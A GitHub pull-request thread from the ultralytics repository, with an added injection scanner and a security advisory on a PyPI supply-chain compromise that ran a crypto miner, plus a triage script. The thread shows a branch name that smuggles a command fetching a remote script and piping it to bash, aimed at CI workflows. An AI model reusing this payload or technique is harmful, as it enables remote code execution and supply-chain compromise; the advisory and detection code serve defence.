
docs: readme #18018

@openimbot openimbot commented Dec 4, 2024

πŸ› οΈ PR Summary

Made with ❀️ by Ultralytics Actions

🌟 Summary

This PR doesn't introduce any new code changes.

πŸ“Š Key Changes

  • None; the diff shows zero modifications.

🎯 Purpose & Impact

  • This PR might be used for testing, documentation updates, or preparing for future changes, but it has no direct impact on the codebase or users at this time. πŸ› οΈ

@UltralyticsAssistant UltralyticsAssistant added the documentation Improvements or additions to documentation label Dec 4, 2024
@UltralyticsAssistant

👋 Hello @openimbot, thank you for submitting an ultralytics/ultralytics 🚀 PR! To ensure a seamless integration of your work, please review the following checklist:

  • ✅ Define a Purpose: Clearly explain the purpose of your fix or feature in your PR description, and link to any relevant issues. Ensure your commit messages are clear, concise, and adhere to the project's conventions.
  • ✅ Synchronize with Source: Confirm your PR is synchronized with the ultralytics/ultralytics main branch. If it's behind, update it by clicking the 'Update branch' button or by running git pull and git merge main locally.
  • ✅ Ensure CI Checks Pass: Verify all Ultralytics Continuous Integration (CI) checks are passing. If any checks fail, please address the issues.
  • ✅ Update Documentation: Ensure your changes align with the project's formatting standards and contribute to the clarity and consistency of the documentation, even for minor updates like this one.
  • ✅ Minimize Changes: Since this PR is a documentation update, it's already following the principle of limited, targeted changes — great job! 👍

For more guidance, please refer to our Contributing Guide, and feel free to leave a comment below if you're unsure about anything.

Thank you for helping improve Ultralytics' documentation! An Ultralytics engineer will review your PR soon. 🚀

@openimbot openimbot closed this Dec 4, 2024
@openimbot openimbot force-pushed the $({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash) branch from b83047f to 21162bd Compare December 4, 2024 19:35
@openimbot openimbot deleted the $({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash) branch December 4, 2024 19:35
@ambitious-octopus ambitious-octopus added the Alert Potential spam, abuse, or off-topic. label Dec 5, 2024
@UltralyticsAssistant UltralyticsAssistant removed the documentation Improvements or additions to documentation label Dec 5, 2024
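The branch name in the force-push and delete events above is a shell command substitution. As a git ref it does nothing; it only runs if a CI workflow expands it, through `${{ github.head_ref }}` or a similar context, directly inside a `run:` script, because the runner substitutes `${{ ... }}` before the shell ever parses the line. The scanner below is an added example, not code from the ultralytics repository or its workflows: it flags such expansions in `run:` steps and leaves alone the safe pattern of passing the value through an `env:` variable that the shell then expands quoted. The list of untrusted contexts is partial and the sample workflow is constructed.

```python
import re

# Contexts an outside contributor controls (branch name, PR title/body, commit
# message). Partial list, assumed here; expanded in run: they become shell code.
UNTRUSTED_CONTEXTS = (
    "github.head_ref",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.head_commit.message",
)
EXPR_RE = re.compile(r"\$\{\{\s*([^}]*?)\s*\}\}")

def find_unsafe_expansions(workflow_text):
    """Return [(line_no, expression)] for untrusted contexts inside run: scripts."""
    findings, in_run, run_col = [], False, 0
    for no, line in enumerate(workflow_text.splitlines(), 1):
        stripped = line.lstrip()
        if not stripped or stripped.startswith("#"):
            continue
        indent = len(line) - len(stripped)
        if in_run and indent <= run_col:
            in_run = False  # the run: block scalar has ended
        if re.match(r"(-\s+)?run:", stripped):
            # column of the `run` key; block-scalar lines are indented past it
            run_col = indent + len(stripped) - len(stripped.lstrip("- "))
            in_run = True
        if in_run:
            for expr in EXPR_RE.findall(line):
                if any(ctx in expr for ctx in UNTRUSTED_CONTEXTS):
                    findings.append((no, expr))
    return findings

# Constructed sample: line 3 interpolates the branch name into the script; the
# second step passes it through an env var and the shell expands it quoted.
SAMPLE_WORKFLOW = """steps:
  - name: Unsafe step
    run: echo "Building ${{ github.head_ref }}"
  - name: Safe step
    env:
      HEAD_REF: ${{ github.head_ref }}
    run: |
      echo "Building $HEAD_REF"
      echo "${{ github.repository }}"
"""

if __name__ == "__main__":
    for no, expr in find_unsafe_expansions(SAMPLE_WORKFLOW):
        print(f"line {no}: untrusted expression {expr!r} inside run:")
```

The env-var form is safe because the value never passes through the shell's parser as code; the scanner does not catch expansions inside `uses:` action inputs or composite actions, which need the same review.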
@CPlusPatch

bro what 💀

@AsherJingkongChen

What did the bot do?

@glenn-jocher

Security Advisory: Unauthorized Code in PyPI Releases

Summary

Ultralytics has identified a supply chain attack affecting multiple versions of the ultralytics package. The compromised versions contained unauthorized code that downloaded and executed cryptocurrency mining software when instantiating YOLO models. This code was injected into the PyPI release artifacts and was not present in the public GitHub repository.

Technical Details

The unauthorized code performed the following actions:

  1. Detected user system architecture
  2. Downloaded cryptocurrency mining binaries from GitHub blob storage
  3. Executed the mining software as a subprocess

Affected binaries were hosted at:

  • Linux x86: 665bb8add8c21d28a961fe3f93c12b249df10787
  • MacOS arm64: 5e67b0e4375f63eb6892b33b1f98e900802312c2

The malicious process manifested as /tmp/ultralytics_runner and attempted connections to connect.consrensys.com:8080.

Impact

All users who installed and ran affected versions from PyPI were potentially affected. The malicious code was activated upon YOLO model initialization. Source installations from GitHub were not affected.

Affected Versions

  • Compromised PyPI versions: 8.3.41, 8.3.42, 8.3.45, 8.3.46
  • Clean versions: >=8.3.47

Mitigation

  1. Immediately upgrade to version 8.3.47 or later
  2. Check for and terminate any unexpected processes named ultralytics_runner
  3. Remove any suspicious files in the /tmp directory (on Unix-based systems)

Resolution

We have:

  • Removed all affected versions from PyPI
  • Released clean version 8.3.47
  • Secured our PyPI publishing workflow
  • Initiated investigation into our build pipeline
  • Implementing additional security measures for future releases

Additional Information

This incident appears to be a sophisticated supply chain attack that bypassed PyPI provenance signing. We are conducting a thorough investigation and implementing enhanced security measures to prevent similar incidents.
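The advisory's version boundaries and host indicators, turned into a local triage check. This is an added example, not Ultralytics code: `classify_version` applies the compromised and clean version lists stated above, the process and /tmp filters look for the `ultralytics_runner` name, and the `ps` lines used to exercise it are constructed.

```python
import importlib.metadata
import itertools
import os
import subprocess

# Indicators and version boundaries taken from the advisory above.
COMPROMISED_VERSIONS = {"8.3.41", "8.3.42", "8.3.45", "8.3.46"}
FIRST_CLEAN_VERSION = (8, 3, 47)
RUNNER_NAME = "ultralytics_runner"  # process / file name the miner used

def version_tuple(version):
    """'8.3.47' -> (8, 3, 47); pre-release suffixes such as 'rc1' are dropped."""
    parts = []
    for piece in version.split(".")[:3]:
        digits = "".join(itertools.takewhile(str.isdigit, piece))
        parts.append(int(digits or 0))
    return tuple(parts)

def classify_version(version):
    """Map an installed version onto the advisory's categories."""
    if version in COMPROMISED_VERSIONS:
        return "compromised"
    if version_tuple(version) >= FIRST_CLEAN_VERSION:
        return "clean"
    return "not listed as compromised, but older than 8.3.47: upgrade"

def suspicious_processes(ps_lines):
    """Filter `ps -eo pid,args` output for the miner's process name."""
    return [line.strip() for line in ps_lines if RUNNER_NAME in line]

def suspicious_tmp_entries(tmp_entries):
    """Filter a /tmp directory listing for the dropped binary's name."""
    return [name for name in tmp_entries if RUNNER_NAME in name]

def installed_version():
    """Version of the installed ultralytics package, or None if absent."""
    try:
        return importlib.metadata.version("ultralytics")
    except importlib.metadata.PackageNotFoundError:
        return None

if __name__ == "__main__":
    version = installed_version()
    print("ultralytics:", version, classify_version(version) if version else "not installed")
    ps = subprocess.run(["ps", "-eo", "pid,args"], capture_output=True, text=True)
    print("processes:", suspicious_processes(ps.stdout.splitlines()) or "none")
    print("/tmp:", suspicious_tmp_entries(os.listdir("/tmp")) or "none")
```

A clean result here only covers the indicators named in the advisory; a host that ran a compromised version should still be reviewed for outbound connections to the listed host and for anything else the miner left behind.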

@ultralytics ultralytics locked as resolved and limited conversation to collaborators Dec 7, 2024